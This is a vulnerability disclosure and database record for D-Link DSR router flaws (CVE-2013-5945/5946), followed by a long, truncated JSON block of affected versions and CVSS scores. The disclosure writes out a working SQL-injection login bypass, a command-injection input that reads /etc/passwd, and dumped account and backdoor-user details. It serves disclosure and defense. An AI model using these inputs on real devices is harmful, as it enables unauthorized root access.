The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) "Ping or Trace an IP Address" or (2) "Perform a DNS Lookup" section. D-Link DSR is a wireless service router product. There is a remote arbitrary command execution vulnerability in the implementation of the D-Link DSR router family. Successful use can allow an attacker to execute arbitrary commands with root privileges. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions. #
CVEs:
CVE-2013-5945 - Authentication Bypass by SQL-Injection
CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
Vulnerable Routers:
D-Link DSR-150 (Firmware < v1.08B44)
D-Link DSR-150N (Firmware < v1.05B64)
D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
Download URL:
http://tsd.dlink.com.tw
Arch:
mips and armv6l, Linux
Author:
0_o -- null_null
nu11.nu11 [at] yahoo.com
Date:
2013-08-18
Purpose:
Get a non-persistent root shell on your D-Link DSR.
Prerequisites:
Network access to the router ports 443 and 23.
!!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
A list of identified vulns follows. This list is not exhaustive as I assume
more vulns are present that just slipped my attention.
The fact that D-Link implemented a backdoor user (for what reason, please??)
and just renamed it instead of completely removing it after it was targetted
by my previous exploit, as well as the triviality of those vulns I found
makes me suggest that more vulns are present that are comparably easy to
exploit.
Since 2013-12-03, patches are available for:
DSR-150: Firmware v1.08B44
DSR-150N: Firmware v1.05B64
DSR-250 and DSR-250N: Firmware v1.08B44
DSR-500 and DSR-500N: Firmware v1.08B77
DSR-1000 and DSR-1000N: Firmware v1.08B77
via http://tsd.dlink.com.tw
And now, have a worthwhile read :-)
-
Contents:
-
Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)
- Exposure: D-Link backdoor user
- Vulnerability: Use of weak hash algorithms
- Exposure: Passwords are stored as plain text in config files
-
Vulnerability: Bad permissions on /etc/shadow
-
Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)
-
Possible via the global webUI login form.
-
File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:
function login.authenticate(tablename, tableInput) local username = tableInput["Users.UserName"] local password = tableInput["Users.Password"] local cur = db.execute(string.format([[ SELECT *, ROWID AS ROWID FROM %s WHERE %s = '%s' AND %s = '%s' ]], tablename, "UserName", username, "Password", password)) local result = false local statusCode = "NONE" if cur then local row = cur:fetch({}, "a") cur:close() result = row ~= nil if result == false then statusCode = "USER_LOGIN_INVALID_PASSWORD" end end return result, statusCode end
- This function creates an SQL statement of the form:
SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';
- Since there is a default admin user account called "admin" around, this is easily exploitable by providing this to the login form:
username = admin password = ' or 'a'='a
- ...resulting in this SQL statement:
SELECT * FROM "Users" WHERE "UserName" = 'admin' AND "Password" = '' or 'a'='a';
-
Old school SQL injection. Ohh, by the way...
-
The same fault can be found in captivePortal.lua -- FREE NETWORKS FOR EVERYONE --
-
File /pfrm2.0/var/www/systemCheck.htm contains:
local function runShellCmd(command) local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout local cmdOutput = pipe:read("*a") pipe:close() return cmdOutput end if (ButtonType and ButtonType == "ping") then [...] local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile globalCmdOutput = runShellCmd (cmd_ping) statusMessage = "Pinging " .. ipToPing [...] elseif (ButtonType and ButtonType == "traceroute") then [...] local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options globalCmdOutput = runShellCmd(cmd) statusMessage = "Traceroute To " .. ipToTraceRoute .. "..." [...] elseif (ButtonType and ButtonType == "dnslookup") then [...] util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile)) statusMessage = "DNS Lookup for " .. Tools like curl are not hindered by these checks.
- All forms allow input like this:
localhost;
example:
localhost;cat /etc/passwd
-
This user provided value is then directly used as part of the input for the call to runShellCmd(c) and thus io.popen(c) in the first form section and os.execute(c) in the second form section.
-
Output from user provided commands gets displayed on the next page beneath the benign command output.
example:
[...]
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
</textarea>
[...]
3. Exposure: D-Link backdoor user:
* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
* You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7".
That was the account I hacked before with my previous exploit:
http://www.exploit-db.com/papers/22930/
And there is a new backdoor user "gkJ9232xXyruTRmY" introduced.
Instead of removing the backdoor, D-Link just created a new one.
* I verified this by showing the /etc/profile:
# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
trap "/bin/login" SIGINT
trap "" SIGTSTP
/pfrm2.0/bin/cli
exit
fi
PS1='DSR-250N> '
4. Vulnerability: Use of weak hash algorithms:
* In the /etc/shadow, salted DES hashes are used to store user passwords.
Since this hash type supports at most 8 characters, users can log in by just
typing the first 8 letters of their passwords when using SSH or telnet.
* An effective password length limitation of 8 characters makes brute force
attacks on user accounts very feasible, even if the user chose a longer
password.
5. Exposure: Passwords are stored as plain text in config files:
* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the
/tmp/system.db is built on boot time, reveals that all user passwords are
stored in plain text.
Example:
[...]
Users = {}
Users[1] = {}
Users[1]["Capabilities"] = ""
Users[1]["DefaultUser"] = "1"
Users[1]["UserId"] = "1"
Users[1]["FirstName"] = "backdoor"
Users[1]["OID"] = "0"
Users[1]["GroupId"] = "1"
Users[1]["UserName"] = "gkJ9232xXyruTRmY"
Users[1]["Password"] = "thisobviouslyisafakepass"
Users[1]["UserTimeOut"] = "10"
Users[1]["_ROWID_"] = "1"
Users[1]["LastName"] = "ssl"
[...]
6. Vulnerability: Bad permissions on /etc/shadow
* This file should have 600 permissions set and not 644. It is world readable.
Pointless, since every process runs as root, no user separation is
done anyway.
DSR-250N> ls -l -a /etc/shadow
-rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow
DSR-250N> ps
PID USER VSZ STAT COMMAND
1 root 2700 S init
2 root 0 SW< [kthreadd]
3 root 0 SW< [ksoftirqd/0]
4 root 0 SW< [events/0]
5 root 0 SW< [khelper]
8 root 0 SW< [async/mgr]
111 root 0 SW< [kblockd/0]
120 root 0 SW< [khubd]
123 root 0 SW< [kseriod]
128 root 0 SW< [kslowd]
129 root 0 SW< [kslowd]
150 root 0 SW [pdflush]
151 root 0 SW [pdflush]
152 root 0 SW< [kswapd0]
200 root 0 SW< [aio/0]
210 root 0 SW< [nfsiod]
220 root 0 SW< [crypto/0]
230 root 0 SW< [cns3xxx_spi.0]
781 root 0 SW< [mtdblockd]
860 root 0 SW< [usbhid_resumer]
874 root 0 SW< [rpciod/0]
903 root 0 SWN [jffs2_gcd_mtd4]
909 root 0 SWN [jffs2_gcd_mtd5]
918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon
1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db
1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db
1049 root 2704 S /usr/sbin/telnetd -l /bin/login
1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd
1141 root 37000 S /pfrm2.0/bin/sshd
1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db
1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db
1560 root 0 SW< [key_timehandler]
1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
1600 root 8036 S rvgd /tmp/system.db
1612 root 0 SW [cavium]
1621 root 8424 S vpnKAd /tmp/system.db
1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d
1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d
1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd
1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
1771 root 2680 S /pfrm2.0/bin/statusD
1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db
1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db
1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db
2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db
2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db
2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db
2205 root 1904 S /pfrm2.0/bin/fReset
2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh
2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100
2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
3355 root 1768 S /pfrm2.0/bin/rt2860apd
3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
5353 root 2704 S -sh
7877 root 2568 S sleep 60
7953 root 2568 S sleep 60
8008 root 2704 R ps
16749 root 2704 S -sh
25690 root 0 SW< [RtmpCmdQTask]
25692 root 0 SW< [RtmpWscTask]
DSR-250N>
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b46"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b39"
},
{
"_id": null,
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b31"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b31"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"_id": null,
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b53"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b50"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b53"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"_id": null,
"model": "dsr-250",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b39"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"_id": null,
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b50"
},
{
"_id": null,
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"_id": null,
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b35"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"_id": null,
"model": "dsr-150",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b29"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"_id": null,
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b20"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b20"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"_id": null,
"model": "dsr-150n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b50"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"_id": null,
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b56"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b56"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"_id": null,
"model": "dsr-500",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"_id": null,
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b29"
},
{
"_id": null,
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b46"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"_id": null,
"model": "dsr-150n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b48"
},
{
"_id": null,
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b46"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"_id": null,
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"_id": null,
"model": "dsr-1000",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-1000",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr-150",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-150",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"_id": null,
"model": "dsr-150n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-150n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.05b64"
},
{
"_id": null,
"model": "dsr-250",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-250",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"_id": null,
"model": "dsr-250n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-250n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"_id": null,
"model": "dsr-500",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-500",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr-500n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-500n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr router dsr-1000",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr router dsr-1000n",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr router dsr-150",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr router dsr-150n",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr router dsr-250n",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr router dsr-500n",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.08b31"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.01b56"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.05b20"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.01b46"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.08b39"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.06b43"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.08b51"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.05b53"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.06b53"
},
{
"_id": null,
"model": "dsr-150n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.05b48"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-250",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-150n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-150",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-500n 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-500 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-250n 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-250 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-150n 1.05b64",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-150 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-1000n 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-1000 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15237"
},
{
"db": "BID",
"id": "64181"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005614"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-320"
},
{
"db": "NVD",
"id": "CVE-2013-5946"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:d-link:dsr-1000",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-1000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-1000n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-1000n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-150",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-150_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-150n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-150n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-250",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-250n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-250n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-500",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-500n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-500n_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005614"
}
]
},
"credits": {
"_id": null,
"data": "nu11.nu11",
"sources": [
{
"db": "BID",
"id": "64181"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-320"
}
],
"trust": 0.9
},
"cve": "CVE-2013-5946",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2013-5946",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-15237",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-65948",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
